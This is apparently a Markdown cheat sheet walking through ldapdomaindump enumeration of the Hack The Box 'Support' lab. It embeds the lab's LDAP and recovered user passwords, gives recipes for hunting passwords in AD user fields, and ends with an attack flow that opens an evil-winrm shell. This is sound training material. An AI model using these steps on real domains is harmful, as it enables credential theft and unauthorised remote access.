daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ldapdomaindump.md (15955B)


      1 ---
      2 title: "ldapdomaindump"
      3 description: "pip3 install ldapdomaindump"
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: ["active-directory"]
      7 tools: ["Nmap", "NetExec", "BloodHound", "ldapsearch", "Evil-WinRM"]
      8 difficulty: intermediate
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ldapdomaindump.md"
     11 ---
     12 # Complete ldapdomaindump Cheat Sheet for HTB Support
     13 
     14 **Target Information:**
     15 - **Domain:** support.htb
     16 - **Username:** ldap
     17 - **Password:** nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
     18 - **Full User Format:** support.htb\ldap or ldap@support.htb
     19 
     20 ***
     21 
     22 ## What is ldapdomaindump?
     23 
     24 **ldapdomaindump** is a Python tool that performs comprehensive Active Directory enumeration via LDAP and outputs the results in **human-readable HTML files** and **JSON files** for further processing. It's essentially an automated LDAP enumeration tool that saves you from running dozens of individual ldapsearch commands.
     25 
     26 ### Why Use ldapdomaindump?
     27 
     28 | Feature | Benefit |
     29 |---------|---------|
     30 | **Automated Enumeration** | Runs multiple LDAP queries automatically |
     31 | **HTML Reports** | Easy-to-read tables you can view in a browser |
     32 | **JSON Output** | Machine-readable format for scripting/parsing |
     33 | **Comprehensive** | Dumps users, groups, computers, trusts, policies in one go |
     34 | **No BloodHound Needed** | Lightweight alternative when you just need basic enumeration |
     35 | **Grep-able JSON** | The JSON files let you search for passwords in `info` fields |
     36 
     37 ***
     38 
     39 ## Installation
     40 
     41 ```bash
     42 # Install via pip (recommended)
     43 pip3 install ldapdomaindump
     44 
     45 # Install from GitHub (latest version)
     46 git clone https://github.com/dirkjanm/ldapdomaindump.git
     47 cd ldapdomaindump
     48 pip3 install .
     49 
     50 # On Kali Linux (usually pre-installed)
     51 apt install ldapdomaindump
     52 
     53 # Verify installation
     54 ldapdomaindump --help
     55 ```
     56 
     57 ***
     58 
     59 ## Basic Command Syntax
     60 
     61 ```bash
     62 ldapdomaindump [options] HOSTNAME
     63 ```
     64 
     65 The tool requires:
     66 1. **Authentication credentials** (`-u` and `-p`)
     67 2. **Target hostname** (domain name or IP address)
     68 
     69 ***
     70 
     71 ## Essential Commands for HTB Support
     72 
     73 ### Standard Enumeration (Recommended)
     74 
     75 ```bash
     76 # Basic enumeration with output directory
     77 ldapdomaindump -u support.htb\\ldap \
     78   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
     79   support.htb \
     80   -o ldap_output
     81 ```
     82 
     83 **What this does:**
     84 - `-u support.htb\\ldap` - Authenticates as the ldap user in the support.htb domain (note the double backslash)
     85 - `-p 'password'` - Provides the password (single quotes protect special characters)
     86 - `support.htb` - The target domain/hostname
     87 - `-o ldap_output` - Creates a directory called `ldap_output` and saves all results there
     88 
     89 ### Using IP Address Instead
     90 
     91 ```bash
     92 # Connect via IP (useful if DNS isn't working)
     93 ldapdomaindump -u support.htb\\ldap \
     94   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
     95   10.10.11.174 \
     96   -o ldap_output
     97 ```
     98 
     99 ### Alternative Username Formats
    100 
    101 ```bash
    102 # Format 1: DOMAIN\username (requires double backslash in bash)
    103 ldapdomaindump -u support.htb\\ldap \
    104   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    105   support.htb \
    106   -o ldap_output
    107 
    108 # Format 2: username@domain (UPN format)
    109 ldapdomaindump -u ldap@support.htb \
    110   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    111   support.htb \
    112   -o ldap_output
    113 
    114 # Format 3: Just username (less reliable)
    115 ldapdomaindump -u ldap \
    116   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    117   support.htb \
    118   -o ldap_output
    119 ```
    120 
    121 ***
    122 
    123 ## Output Files Generated
    124 
    125 After running ldapdomaindump, you'll get **6 HTML files** and **6 JSON files**:
    126 
    127 | File Name | Description | What to Look For |
    128 |-----------|-------------|------------------|
    129 | **domain_users.html/json** | All user accounts in the domain | Passwords in `info`/`description` fields, service accounts, privileged users |
    130 | **domain_groups.html/json** | All security groups | Domain Admins, Enterprise Admins, Remote Management Users |
    131 | **domain_computers.html/json** | All computer objects | Domain controllers, servers, workstations, OS versions |
    132 | **domain_policy.html/json** | Domain password policy | Min password length, lockout policy, password age |
    133 | **domain_trusts.html/json** | Trust relationships | External domains, trust direction and type |
    134 | **domain_users_by_group.html/json** | Users organized by group membership | Quick view of who's in what group |
    135 
    136 ### Example Output Directory
    137 
    138 ```bash
    139 ldap_output/
    140 ├── domain_computers.html
    141 ├── domain_computers.json
    142 ├── domain_groups.html
    143 ├── domain_groups.json
    144 ├── domain_policy.html
    145 ├── domain_policy.json
    146 ├── domain_trusts.html
    147 ├── domain_trusts.json
    148 ├── domain_users.html
    149 ├── domain_users.json
    150 ├── domain_users_by_group.html
    151 └── domain_users_by_group.json
    152 ```
    153 
    154 ***
    155 
    156 ## Analyzing the Output
    157 
    158 ### Critical Information to Check
    159 
    160 #### 1. **domain_users.json** - Hunt for Passwords!
    161 
    162 ```bash
    163 # Search for passwords in info fields (HTB Support specific!)
    164 grep -i "info" ldap_output/domain_users.json
    165 
    166 # Search for description fields
    167 grep -i "description" ldap_output/domain_users.json
    168 
    169 # Search for specific user
    170 grep -A 20 '"name": "support"' ldap_output/domain_users.json
    171 
    172 # Look for service accounts
    173 grep -i "service\|svc\|admin" ldap_output/domain_users.json
    174 ```
    175 
    176 **In HTB Support, this reveals:**
    177 ```json
    178 {
    179   "name": "support",
    180   "info": "Ironside47pleasure40Watchful",
    181   "memberOf": [
    182     "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb",
    183     "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb"
    184   ]
    185 }
    186 ```
    187 
    188 #### 2. **domain_groups.json** - Privileged Groups
    189 
    190 ```bash
    191 # Find Domain Admins
    192 grep -A 10 "Domain Admins" ldap_output/domain_groups.json
    193 
    194 # Find Remote Management Users (WinRM access!)
    195 grep -A 10 "Remote Management Users" ldap_output/domain_groups.json
    196 
    197 # Find all admin groups
    198 grep -i "admin" ldap_output/domain_groups.json
    199 ```
    200 
    201 #### 3. **domain_computers.json** - Target Systems
    202 
    203 ```bash
    204 # Find domain controllers
    205 grep -i "SERVER\|DC" ldap_output/domain_computers.json
    206 
    207 # Check operating systems
    208 grep "operatingSystem" ldap_output/domain_computers.json
    209 ```
    210 
    211 #### 4. **View HTML in Browser**
    212 
    213 ```bash
    214 # Open in default browser (Linux)
    215 firefox ldap_output/domain_users.html
    216 
    217 # Python simple HTTP server to view all files
    218 cd ldap_output
    219 python3 -m http.server 8000
    220 # Then browse to http://localhost:8000
    221 ```
    222 
    223 ***
    224 
    225 ## Advanced Usage
    226 
    227 ### Resolve All Objects (Slower but More Complete)
    228 
    229 ```bash
    230 # Resolve all LDAP object references to names
    231 ldapdomaindump -u support.htb\\ldap \
    232   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    233   support.htb \
    234   -o ldap_output \
    235   -r
    236 ```
    237 
    238 **What `-r` does:** Resolves SIDs and DNs to readable names, but takes longer to complete.
    239 
    240 ### Use LDAPS (SSL/TLS)
    241 
    242 ```bash
    243 # Connect via LDAPS on port 636
    244 ldapdomaindump -u support.htb\\ldap \
    245   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    246   support.htb \
    247   -o ldap_output \
    248   -l ldaps://support.htb:636
    249 ```
    250 
    251 ### No HTML Output (JSON Only)
    252 
    253 ```bash
    254 # Generate only JSON files (faster, no HTML rendering)
    255 ldapdomaindump -u support.htb\\ldap \
    256   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    257   support.htb \
    258   -o ldap_output \
    259   --no-html
    260 ```
    261 
    262 ### No JSON Output (HTML Only)
    263 
    264 ```bash
    265 # Generate only HTML files
    266 ldapdomaindump -u support.htb\\ldap \
    267   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    268   support.htb \
    269   -o ldap_output \
    270   --no-json
    271 ```
    272 
    273 ***
    274 
    275 ## Complete Enumeration Workflow
    276 
    277 ### Step 1: Run ldapdomaindump
    278 
    279 ```bash
    280 ldapdomaindump -u support.htb\\ldap \
    281   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    282   support.htb \
    283   -o ldap_output
    284 ```
    285 
    286 **Expected Output:**
    287 ```
    288 [*] Connecting to host...
    289 [*] Binding to host
    290 [+] Bind OK
    291 [*] Starting domain dump
    292 [+] Domain dump finished
    293 ```
    294 
    295 ### Step 2: Check User Info Fields for Passwords
    296 
    297 ```bash
    298 # Quick check for passwords in info fields
    299 grep -i "info" ldap_output/domain_users.json | grep -v '""'
    300 
    301 # More detailed search
    302 jq '.[] | select(.info != "") | {name: .name, info: .info, memberOf: .memberOf}' ldap_output/domain_users.json
    303 ```
    304 
    305 ### Step 3: Identify Privileged Users
    306 
    307 ```bash
    308 # Users in Remote Management Users group
    309 jq '.[] | select(.memberOf[]? | contains("Remote Management Users")) | .name' ldap_output/domain_users.json
    310 
    311 # Users with adminCount=1
    312 grep -B 5 '"adminCount": 1' ldap_output/domain_users.json
    313 ```
    314 
    315 ### Step 4: View HTML Reports
    316 
    317 ```bash
    318 # Start web server to view all reports
    319 cd ldap_output
    320 python3 -m http.server 8000
    321 ```
    322 
    323 Then open your browser to:
    324 - http://localhost:8000/domain_users.html
    325 - http://localhost:8000/domain_groups.html
    326 - http://localhost:8000/domain_computers.html
    327 
    328 ***
    329 
    330 ## Parsing JSON Output with jq
    331 
    332 ```bash
    333 # Pretty print entire user list
    334 jq '.' ldap_output/domain_users.json
    335 
    336 # Get all usernames
    337 jq '.[].name' ldap_output/domain_users.json
    338 
    339 # Users with non-empty info fields
    340 jq '.[] | select(.info != "") | {name: .name, info: .info}' ldap_output/domain_users.json
    341 
    342 # Users with "admin" in their name
    343 jq '.[] | select(.name | contains("admin"))' ldap_output/domain_users.json
    344 
    345 # Get Domain Admins members
    346 jq '.[] | select(.name == "Domain Admins") | .members' ldap_output/domain_groups.json
    347 
    348 # Count total users
    349 jq '. | length' ldap_output/domain_users.json
    350 
    351 # Export usernames to file
    352 jq -r '.[].name' ldap_output/domain_users.json > usernames.txt
    353 ```
    354 
    355 ***
    356 
    357 ## Common Use Cases
    358 
    359 ### Finding Credentials (HTB Support Scenario)
    360 
    361 ```bash
    362 # 1. Run ldapdomaindump
    363 ldapdomaindump -u support.htb\\ldap \
    364   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    365   support.htb \
    366   -o ldap_output
    367 
    368 # 2. Search for passwords in info field
    369 grep "info" ldap_output/domain_users.json | grep -v '""'
    370 
    371 # 3. You'll find:
    372 # "info": "Ironside47pleasure40Watchful"
    373 
    374 # 4. Test the credentials
    375 crackmapexec smb support.htb -u support -p 'Ironside47pleasure40Watchful'
    376 ```
    377 
    378 ### Building a Target List
    379 
    380 ```bash
    381 # Extract all usernames
    382 jq -r '.[].name' ldap_output/domain_users.json > users.txt
    383 
    384 # Extract all computer names
    385 jq -r '.[].name' ldap_output/domain_computers.json > computers.txt
    386 
    387 # Extract users with descriptions (might contain passwords)
    388 jq '.[] | select(.description != "") | {name: .name, description: .description}' ldap_output/domain_users.json
    389 ```
    390 
    391 ### Identifying High-Value Targets
    392 
    393 ```bash
    394 # Domain Admins
    395 jq '.[] | select(.name == "Domain Admins")' ldap_output/domain_groups.json
    396 
    397 # Enterprise Admins
    398 jq '.[] | select(.name == "Enterprise Admins")' ldap_output/domain_groups.json
    399 
    400 # Users with SPNs (Kerberoastable)
    401 jq '.[] | select(.servicePrincipalName != null) | {name: .name, spn: .servicePrincipalName}' ldap_output/domain_users.json
    402 ```
    403 
    404 ***
    405 
    406 ## Troubleshooting
    407 
    408 ### Error: "Could not connect to host"
    409 
    410 ```bash
    411 # Check if LDAP port is open
    412 nmap -p 389,636,3268,3269 support.htb
    413 
    414 # Try with IP instead of hostname
    415 ldapdomaindump -u support.htb\\ldap \
    416   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    417   10.10.11.174 \
    418   -o ldap_output
    419 
    420 # Try LDAPS
    421 ldapdomaindump -u support.htb\\ldap \
    422   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    423   support.htb \
    424   -o ldap_output \
    425   -l ldaps://support.htb
    426 ```
    427 
    428 ### Error: "Bind failed"
    429 
    430 ```bash
    431 # Check username format
    432 # Try different formats:
    433 
    434 # Format 1: DOMAIN\user
    435 ldapdomaindump -u support.htb\\ldap -p 'password' support.htb -o ldap_output
    436 
    437 # Format 2: user@domain
    438 ldapdomaindump -u ldap@support.htb -p 'password' support.htb -o ldap_output
    439 
    440 # Verify credentials with crackmapexec
    441 crackmapexec ldap support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
    442 ```
    443 
    444 ### Password with Special Characters
    445 
    446 ```bash
    447 # Always use single quotes to protect special characters
    448 ldapdomaindump -u support.htb\\ldap \
    449   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    450   support.htb \
    451   -o ldap_output
    452 
    453 # Alternatively, escape special characters
    454 ldapdomaindump -u support.htb\\\\ldap \
    455   -p nvEfEK16\^1aM4\$e7AclUf8x\$tRWxPWO1%lmz \
    456   support.htb \
    457   -o ldap_output
    458 ```
    459 
    460 ***
    461 
    462 ## Converting to BloodHound Format
    463 
    464 ldapdomaindump output can be converted to BloodHound-compatible JSON:
    465 
    466 ```bash
    467 # Clone the converter tool
    468 git clone https://github.com/blurbdust/ldd2bh.git
    469 cd ldd2bh
    470 
    471 # Convert ldapdomaindump output
    472 python3 ldd2bh.py -d /path/to/ldap_output
    473 
    474 # Import the generated JSON files into BloodHound
    475 ```
    476 
    477 ***
    478 
    479 ## Comparison with Other Tools
    480 
    481 | Tool | Speed | Output Format | Use Case |
    482 |------|-------|---------------|----------|
    483 | **ldapdomaindump** | Medium | HTML + JSON | Quick human-readable enumeration |
    484 | **BloodHound** | Slow | Neo4j Graph | Complex attack path analysis |
    485 | **ldapsearch** | Fast | LDIF/Text | Specific targeted queries |
    486 | **crackmapexec** | Fast | Terminal | Quick validation and spraying |
    487 | **windapsearch** | Medium | Text | Python-based enumeration |
    488 
    489 **When to use ldapdomaindump:**
    490 - You want quick, comprehensive enumeration
    491 - You prefer browsing HTML tables
    492 - You need JSON for scripting
    493 - You don't need complex graph analysis
    494 - You're on a slow connection (BloodHound can be heavy)
    495 
    496 ***
    497 
    498 ## Complete Command Reference Table
    499 
    500 | Flag | Long Form | Description | Example |
    501 |------|-----------|-------------|---------|
    502 | `-u` | `--user` | Username for authentication (DOMAIN\user or user@domain) | `-u support.htb\\ldap` |
    503 | `-p` | `--password` | Password (use single quotes for special chars) | `-p 'password123'` |
    504 | `-o` | `--outdir` | Output directory for results | `-o ldap_output` |
    505 | `-l` | `--ldapurl` | Custom LDAP URL | `-l ldaps://dc.support.htb:636` |
    506 | `-r` | `--resolve` | Resolve all LDAP references (slower but more complete) | `-r` |
    507 | `-m` | `--minimal` | Minimal output, only essential attributes | `-m` |
    508 | `-n` | `--dns-server` | Custom DNS server IP | `-n 10.10.11.174` |
    509 | `-d` | `--debug` | Enable debug output | `-d` |
    510 | `--no-html` | N/A | Don't generate HTML files (JSON only) | `--no-html` |
    511 | `--no-json` | N/A | Don't generate JSON files (HTML only) | `--no-json` |
    512 | `--no-grep` | N/A | Don't generate grep-able output | `--no-grep` |
    513 
    514 ***
    515 
    516 ## Quick Reference Commands
    517 
    518 ```bash
    519 # Standard enumeration
    520 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output
    521 
    522 # With resolution (slower, more detail)
    523 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output -r
    524 
    525 # Via IP address
    526 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174 -o ldap_output
    527 
    528 # JSON only (faster)
    529 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output --no-html
    530 
    531 # LDAPS connection
    532 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output -l ldaps://support.htb:636
    533 
    534 # Hunt for passwords
    535 grep -i "info\|description" ldap_output/domain_users.json | grep -v '""'
    536 
    537 # View in browser
    538 cd ldap_output && python3 -m http.server 8000
    539 ```
    540 
    541 ***
    542 
    543 ## Pro Tips for HTB Support
    544 
    545 1. **The info field contains the password** - Always check `domain_users.json` for the `info` attribute
    546 2. **Check group memberships** - Look for "Remote Management Users" to find WinRM-enabled accounts
    547 3. **JSON is greppable** - Use `grep`, `jq`, or `cat` to search the JSON files
    548 4. **HTML is browsable** - Open the HTML files in a browser for easier reading
    549 5. **Compare with BloodHound** - Run both tools for comprehensive coverage
    550 6. **Save your output** - Keep the output directory for reference throughout the engagement
    551 7. **No creds needed first** - Always run anonymous ldapsearch for namingContexts before ldapdomaindump
    552 
    553 ## Complete HTB Support Attack Flow
    554 
    555 ```bash
    556 # Step 1: Discover base DN (no auth)
    557 ldapsearch -x -H ldap://support.htb -b "" -s base namingContexts
    558 
    559 # Step 2: Run ldapdomaindump with initial creds
    560 ldapdomaindump -u support.htb\\ldap \
    561   -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    562   support.htb \
    563   -o ldap_output
    564 
    565 # Step 3: Find password in info field
    566 grep "info" ldap_output/domain_users.json | grep -v '""'
    567 # Result: "info": "Ironside47pleasure40Watchful"
    568 
    569 # Step 4: Verify new credentials
    570 crackmapexec winrm support.htb -u support -p 'Ironside47pleasure40Watchful'
    571 
    572 # Step 5: Get shell
    573 evil-winrm -i support.htb -u support -p 'Ironside47pleasure40Watchful'
    574 ```